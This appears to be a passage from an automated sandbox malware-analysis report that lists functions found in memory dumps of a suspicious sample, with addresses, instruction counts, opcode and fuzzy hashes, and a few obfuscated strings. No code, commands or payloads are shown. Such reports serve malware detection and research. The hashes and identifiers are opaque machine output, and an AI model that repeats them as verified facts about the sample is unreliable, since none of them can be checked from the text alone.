Opcode ID: 4b9366756387682e66e73ad6c246817c37b95ce51ec389e6e6ddfaa17d28ced5
Instruction ID: 470370764a9940da2f3bbb64d0d6176963d9568c6cbfeab5078aa30df8370dd8
Opcode Fuzzy Hash: 4b9366756387682e66e73ad6c246817c37b95ce51ec389e6e6ddfaa17d28ced5
Instruction Fuzzy Hash: 20D080131053A04FC7176594BD511DF3B35F8421A67052193F508CD236CE3C074B43D5

Function 06A10288 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64bdf4b50c72139b3a1d9c726f64b6f8095f4bfdae9a2c1ad83f3d61a2a5f4ad
Instruction ID: ed114f46ae6c1b559c6139a0ff3b21a951ede8aa5f9ecb2021b344c38cafbef1
Opcode Fuzzy Hash: 64bdf4b50c72139b3a1d9c726f64b6f8095f4bfdae9a2c1ad83f3d61a2a5f4ad
Instruction Fuzzy Hash: D0D0231710D5D457C311175938216D77F5D8B45420BDC0081D2D587106C800548387F5

Function 06A1D948 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61529d98c378d2d3d06f90b6c892c09361150bf2bb55821b8f2f84987a19340f
Instruction ID: 9bb5723ec7efd2174892016d4b1b25ae69fc7b150575c33aa3d455a569fb1375
Opcode Fuzzy Hash: 61529d98c378d2d3d06f90b6c892c09361150bf2bb55821b8f2f84987a19340f
Instruction Fuzzy Hash: 3EC08C0018B3C03FE263A3608C60DF31E6A6D96008BA804C6F888DA367F9048D0283BA

Function 069A1308 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d58be37f5c3f418b1bedc42f32ef0df4875fdc7eff735ab0dbadf167973e36
Instruction ID: fd537940a8100f028532c66dc9cb92cad27a14fb039556be7db28bd5e10a3581
Opcode Fuzzy Hash: 27d58be37f5c3f418b1bedc42f32ef0df4875fdc7eff735ab0dbadf167973e36
Instruction Fuzzy Hash: EDD0A7710093954FC3136718F8083C57FACAB41226F0084AAD1484B257D7647805C7B2

Function 06A19958 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7821685feec5e6a5a312e0313cdf590c98d53497d21452415f98314e38364eb4
Instruction ID: fb9e5f6e31fd666d7d1a034f6e449c04765ec22a8d7a946fa3bc001bcf42d5d2
Opcode Fuzzy Hash: 7821685feec5e6a5a312e0313cdf590c98d53497d21452415f98314e38364eb4
Instruction Fuzzy Hash: 67D0A71994C2CECEF779176A98303E67F71FB81504BA840D6C4D19E367D9098422E76B

Function 069A5BD0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a82c3efd1e29188015c28b26415d27328472c81df0dc4b412ffa5309ac5a80e
Instruction ID: e1b88c674e6b0a5efcb837d84cc53637ea1f8eb1ba9091a01bf8181cd9058445
Opcode Fuzzy Hash: 8a82c3efd1e29188015c28b26415d27328472c81df0dc4b412ffa5309ac5a80e
Instruction Fuzzy Hash: D5C08C632892A08FE30252E0282A9C3AB70CB22236B1100A3D284EE0938854C986C3E6

Function 06A10434 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f26a69afbc824bb7904ea0f0b23cc5ba8c07c51b776b5fef09a21e6ae3e8592f
Instruction ID: e912dbfea875d66927f50afffe1fc958f3c99fe6fdd8610c17fef0ed06cddacb
Opcode Fuzzy Hash: f26a69afbc824bb7904ea0f0b23cc5ba8c07c51b776b5fef09a21e6ae3e8592f
Instruction Fuzzy Hash: 7CD0C93AB001048F9B84DBA9E0415EC7BF1EFC862670000AAE20ACBA20DB3198158F91

Function 06A16B00 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550bf50d8bb262c9e9d4f54f3cae6b239500facae68d732fea5eb14129c604da
Instruction ID: 68fd2905e1cfea74481f85c66b4ac87dda163cd11b8d700a3a60fcd025bf57e7
Opcode Fuzzy Hash: 550bf50d8bb262c9e9d4f54f3cae6b239500facae68d732fea5eb14129c604da
Instruction Fuzzy Hash: A8D0C93911D2945FC3428778AC15C917FB89A0A52571642C2F1588F2B3C615A8158771

Function 069A06B0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07dc1b2f14d496c1f96c8b518255c98749b5d2b115f1db3112209ed3cf06593
Instruction ID: 9eb58385097ef63304261bbe4230fb2b7960e297be2dd38045b351d6989fedb9
Opcode Fuzzy Hash: e07dc1b2f14d496c1f96c8b518255c98749b5d2b115f1db3112209ed3cf06593
Instruction Fuzzy Hash: 4BC01282D0A2C04FDB1B532448706962F768F5310470555C6E1818B192E819AF5AC752

Function 06A1069C Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14db71155115b25a216810fdf64a274daaba3895298ab87868f0b05b9a8a1e8
Instruction ID: 23474baaf8541c8de3873d4bb8b4e8b77e0d1fb3acf8f1fea29a929e3c42872c
Opcode Fuzzy Hash: e14db71155115b25a216810fdf64a274daaba3895298ab87868f0b05b9a8a1e8
Instruction Fuzzy Hash: 7BD012397400108F9744DA59D0005E877F1DFC461674004E5E30ACBA30CB30DD958790

Function 06A1C0F8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8a077136f81dc2f2b1134d0dd8b14dd3e9a7511db7f1af791c2846fbb70464
Instruction ID: 548e7d211800c29edd58f54044f968d645b2ddba77eae964134e441bb23046e5
Opcode Fuzzy Hash: ec8a077136f81dc2f2b1134d0dd8b14dd3e9a7511db7f1af791c2846fbb70464
Instruction Fuzzy Hash: 4FC08C243403085BD6143BF1E82CB1E7ACAE7C8A21F204868E80E8B785FD2A8C018255

Function 06A16B40 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ecadce48a5dd172c802026c02409b03a6f6067ef2924132117b2d75a452bb1
Instruction ID: 97829996f972a3b513ab7e5df06040e9b8fb4dd1d10abb0002985d5c4a84c1e1
Opcode Fuzzy Hash: 40ecadce48a5dd172c802026c02409b03a6f6067ef2924132117b2d75a452bb1
Instruction Fuzzy Hash: BFC0122A60A8A01FC3128B6C38252D27F2A8B4A454B094082E9E49732BC91848038BA9

Function 06A197C8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c9d74f1dad7f4f02fb02fc91fc4aa0b784a40a106a8b5589e0117e3fc1cebc0
Instruction ID: 2b0c20ff09fa9fe1e5ae77733fec85c5c58843a3720d1e05a5b97c5f4952e49c
Opcode Fuzzy Hash: 0c9d74f1dad7f4f02fb02fc91fc4aa0b784a40a106a8b5589e0117e3fc1cebc0
Instruction Fuzzy Hash: 99D0C96505C1C4CFDA128B24C8293D83F65EF86218B6844E9D0D04A653C11A2423D719

Function 06A1B720 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5306d2d6cdf3a50e4d8fa44e7f170be15c6a04726fabaa5e2dc397433d9796d
Instruction ID: d105bbdb6d69a7cb5d1d61c9fe6d5a1f93004ef5fb3e806fdd7f33b84f6f557e
Opcode Fuzzy Hash: c5306d2d6cdf3a50e4d8fa44e7f170be15c6a04726fabaa5e2dc397433d9796d
Instruction Fuzzy Hash: 62C08C055082D00FF59493284829B8E0B43A7C2089F8440ADC890EA252E708A0435315

Function 06A1764E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfc0912a1e8c1d48f37f244e040b423aa8f82c593cb03694e55468147ed41ea
Instruction ID: efc67b8aa8a04cf270d710c3e9708683a1a4445e161795586b769bc27a23c606
Opcode Fuzzy Hash: 6bfc0912a1e8c1d48f37f244e040b423aa8f82c593cb03694e55468147ed41ea
Instruction Fuzzy Hash: 02C08CB1A08089DFC3008A24B80A3D4BB70DB2122AF000188E80A19406D72008208A95

Function 069A1840 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1b19c141673c058caf1866308efab171a12e1a56810b2939829d29c61a42cb
Instruction ID: d88477142bebcc131f5da8e0b910c2dfc3466ec7fbdbec18a1cc3c2cddd83511
Opcode Fuzzy Hash: 5d1b19c141673c058caf1866308efab171a12e1a56810b2939829d29c61a42cb
Instruction Fuzzy Hash: E6C04CB86002015FE3489F648C44B2BBEE3EFD8716F61C419E645C7268CE79C855DBA6

Function 06A1C128 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0350f8b6371194c1b421b96b03799cacf7cd5e3f3f59cbd9151559e795a9acb
Instruction ID: 81ae8f25f23ed764814164d91dbc9da040ab9ebea031549c979837330c7ded3c
Opcode Fuzzy Hash: b0350f8b6371194c1b421b96b03799cacf7cd5e3f3f59cbd9151559e795a9acb
Instruction Fuzzy Hash: C0B012751E4340A67285F7604D80F1F5913FFE5B24F909C07B60B1401085659468926F

Function 069A06E8 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3333d17ebd974c0fedd83f81e81739b48fec098ee6be35a9e00b61214c35aa07
Instruction ID: 8ed131a2d7ac2e4e0de48550a062129e4b134ab9b942ab3960a19db109c9a2f2
Opcode Fuzzy Hash: 3333d17ebd974c0fedd83f81e81739b48fec098ee6be35a9e00b61214c35aa07
Instruction Fuzzy Hash: 3BB0123000034E8FC5407764F8056083B5DFA905097406110F40C0902D5EAC384247D6

Function 069A1318 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d6e36215675912d1780feec411fd76a996a787d344d1f41222bf73ce38d5b6
Instruction ID: 94ace07213b0dd6f8af57adf65f0a3af390888590ca66757ea360de4c1b592a3
Opcode Fuzzy Hash: 60d6e36215675912d1780feec411fd76a996a787d344d1f41222bf73ce38d5b6
Instruction Fuzzy Hash: 72B0123004031E8FC6047B54F84861837ACE580A0A740C520A40C0524A9E68780187A5

Function 06A16B10 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Function 06A11108 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c596a41005c1f4ba45b894a6f8c806494b2e7a4d445d5fb3b4a770eb66dba9a
Instruction ID: 7e199b298a31bb4a8eaad63e89be2624657513555148f3ab5d52e71a270c574e
Opcode Fuzzy Hash: 8c596a41005c1f4ba45b894a6f8c806494b2e7a4d445d5fb3b4a770eb66dba9a
Instruction Fuzzy Hash: 02C09271601340CFCB06CF30C1488047B72EF4630635984D8E0098B622CB36DC82CB01

Function 069A12F3 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c359550484e939c55aa853f030127b3ef03b8fb2785057a823c16259ab466f
Instruction ID: ffe47bfbea69b43aa85aa55e98406c6cfb405a7f858b4a48b7f7a6a3ab568895
Opcode Fuzzy Hash: 83c359550484e939c55aa853f030127b3ef03b8fb2785057a823c16259ab466f
Instruction Fuzzy Hash: 9DB01291D052C09BCF02A210845010437A516413047068892800047251DD18E805C211

Function 06A1768A Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02aa1ef134ae8aa33d0741fe07fdc5b6b1c4c451e33516623868920c0790a30d
Instruction ID: 874f485760977cd470f3a6e9ae9f36ab1bca0dc82f05e842d64946b17413a0b2
Opcode Fuzzy Hash: 02aa1ef134ae8aa33d0741fe07fdc5b6b1c4c451e33516623868920c0790a30d
Instruction Fuzzy Hash: 8CA0223200C00C8B02000800380E030B330C38003230032C2EC0E08C0CEA02882002C0

Function 06A1C124 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea16786d81303e4e589e0a21e42ad4d22089f28eda91c3285127fca3f477f80e
Instruction ID: 6a9f6e619ba66a1a9b78e68cffa1cd3fad61c3245b4bdd08e169340200c5eed4
Opcode Fuzzy Hash: ea16786d81303e4e589e0a21e42ad4d22089f28eda91c3285127fca3f477f80e
Instruction Fuzzy Hash:

Non-executed Functions

Function 069A948B Relevance: 4.5, Strings: 3, Instructions: 786COMMON

Download Yara Rule

Strings

zgl^, xrefs: 069A9A0F, 069A9A14, 069A9A75, 069A9A7A, 069A9ADB, 069A9AE0, 069A9B41, 069A9B46
3{gl^, xrefs: 069A9530, 069A9535, 069A9593, 069A9598, 069A95F9, 069A95FE, 069A965F, 069A9664
#{gl^, xrefs: 069A974D, 069A9752, 069A97B3, 069A97B8

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: #{gl^$3{gl^$zgl^
API String ID: 0-3175193065
Opcode ID: 88177719dd33ed87793b631af4d4ddbad563abe8d39bc06dfc05b5111d87a96b
Instruction ID: d843d63f87c1dc8054626753fc590ac1fc641d7a839c5fe45708a3429ba9321d
Opcode Fuzzy Hash: 88177719dd33ed87793b631af4d4ddbad563abe8d39bc06dfc05b5111d87a96b
Instruction Fuzzy Hash: 76620DB06003009BE748DF19D45472A7AE6EFC4709F64C59DD1099F392DFBAD90B8BA1

Function 069A9498 Relevance: 4.5, Strings: 3, Instructions: 780COMMON

Download Yara Rule

Strings

zgl^, xrefs: 069A9A0F, 069A9A14, 069A9A75, 069A9A7A, 069A9ADB, 069A9AE0, 069A9B41, 069A9B46
3{gl^, xrefs: 069A9530, 069A9535, 069A9593, 069A9598, 069A95F9, 069A95FE, 069A965F, 069A9664
#{gl^, xrefs: 069A974D, 069A9752, 069A97B3, 069A97B8

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: #{gl^$3{gl^$zgl^
API String ID: 0-3175193065
Opcode ID: ffb680801122fa913af43b024e9f7eaf03ff396cd35c591c465cb5d43768b262
Instruction ID: ec9e8b83a57fe21bd5d1476d0418db9e03772ef10d9a0777a6f051d95967ea09
Opcode Fuzzy Hash: ffb680801122fa913af43b024e9f7eaf03ff396cd35c591c465cb5d43768b262
Instruction Fuzzy Hash: 32620DB06003009BE748DF19D454B2A7AE6EFC4709F64C59DD1099F392DFBAD90B8BA1

Function 06A34200 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

%, xrefs: 06A345F4

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 40ca534c68ba6991b1b2ac34c022b0057cd45a8a3b9be3131a87fdfedf4fe3a9
Instruction ID: e251e10e0316153d5d721fdf5f39fe5050247a108a34018b519af4923262d34e
Opcode Fuzzy Hash: 40ca534c68ba6991b1b2ac34c022b0057cd45a8a3b9be3131a87fdfedf4fe3a9
Instruction Fuzzy Hash: 29023774A00314CFDB58EFA4D848AAEBBF2FF88701F148569E506AB395DB35D905CB90

Function 06A36AF0 Relevance: 1.3, Instructions: 1271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59a9bdfbbdca359b89919b7b583bb18f06b76f7ce573579f82214a915cc1400
Instruction ID: 0a3e06d0602d9e03b5db2bbba11ea10afbe133d7875cdad7a0766b25b46aa129
Opcode Fuzzy Hash: f59a9bdfbbdca359b89919b7b583bb18f06b76f7ce573579f82214a915cc1400
Instruction Fuzzy Hash: 95C20774A00229DFDB65EF64C944BADBBB2FF89301F1085A9E909AB250DB35DD81CF50

Function 069A8D00 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71aff0298a62787005f807ad32f7b81336708046784c161208a1660d75b3ad01
Instruction ID: dbd227c9df5b8543cc5bb3d65c703d288c38bf383179b965e73a656745438e50
Opcode Fuzzy Hash: 71aff0298a62787005f807ad32f7b81336708046784c161208a1660d75b3ad01
Instruction Fuzzy Hash: AC129B31A003199FDB51DF68D984BAEBBF6BF84300F1485AAE509AB651DB30ED45CBD0

Function 06A3E3D0 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf3a74a91c5dec872710ed5400149ac33ea9586a4b13d61718637d65d15e973
Instruction ID: 9f8851264d622407c653b1a6de4511b83b774b5a4b6b698375a7e680143788cd
Opcode Fuzzy Hash: 5cf3a74a91c5dec872710ed5400149ac33ea9586a4b13d61718637d65d15e973
Instruction Fuzzy Hash: 8B221870A00328DFDB95DF65C984B9DBBB2BF89301F1080AAE849AB251DB35DD85CF51

Function 06A9BF10 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a9311b44c9a2a639228c5368c3bde386b4207351bbb59161c51705876aac80
Instruction ID: f8dad8cf2a4b089f08770d44c4fb686e3d4b7cf9ebd3253677d0f8a691b3e6ad
Opcode Fuzzy Hash: 62a9311b44c9a2a639228c5368c3bde386b4207351bbb59161c51705876aac80
Instruction Fuzzy Hash: F6C1BC31B00B108FDB99EB7AD950BAFB7F6AF89700F24446DD1568B691CB35E801CB61

Function 06A974A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e4198888f7980d9cac4e60e8e906f5a52ef436968f38a4949274ba02daf48f
Instruction ID: 2a207af022278355ecdafc357e87ba003b7a4a9682905413d4cb630abe4f11b3
Opcode Fuzzy Hash: 84e4198888f7980d9cac4e60e8e906f5a52ef436968f38a4949274ba02daf48f
Instruction Fuzzy Hash: DCE1E774E102598FDB14DFA9C580AAEFBF2FB89305F24C169D414AB355DB30A941CFA0

Function 06A95450 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ccc21bc7f7b2ada3d618e9c8fab63454b2376bbf541d61cc7c3629eb2a5de94
Instruction ID: 95be16240b6879c3151fc77f9d810ae98f9362f3e3c50b5a97043dedbfc9ccf5
Opcode Fuzzy Hash: 8ccc21bc7f7b2ada3d618e9c8fab63454b2376bbf541d61cc7c3629eb2a5de94
Instruction Fuzzy Hash: C6E1D674E002598FDB14EFA9C5819AEFBF2BF89305F24C169E415AB355DB30A942CF60

Function 06A94BE0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d14d118d4d18cf61d68f22561b7f5f437e85b7604dc2e62eeb485e0f947388e2
Instruction ID: 975c49f8173fb6a73bf72c90320b6cf2c1b5381a7253736dfb9705b7fde93dd5
Opcode Fuzzy Hash: d14d118d4d18cf61d68f22561b7f5f437e85b7604dc2e62eeb485e0f947388e2
Instruction Fuzzy Hash: F3E1E774E002598FDB14DFA9C580AAEFBF2FF89305F248169E415AB355D731A942CFA0

Function 06A95888 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a05a4c8d1f1e8becd591f61aa3db7231ca0aa4d325c5cb87cc93575e991596a
Instruction ID: c4a0af6a78aa096e593e8d7bef71b4ff0ddd3cfdbbced3f91f88e01b89f01590
Opcode Fuzzy Hash: 0a05a4c8d1f1e8becd591f61aa3db7231ca0aa4d325c5cb87cc93575e991596a
Instruction Fuzzy Hash: 4DE1F674E002598FDB14DFA9C581AAEFBF2FF89304F248169E415AB355D730A942CFA0

Function 06A95018 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity
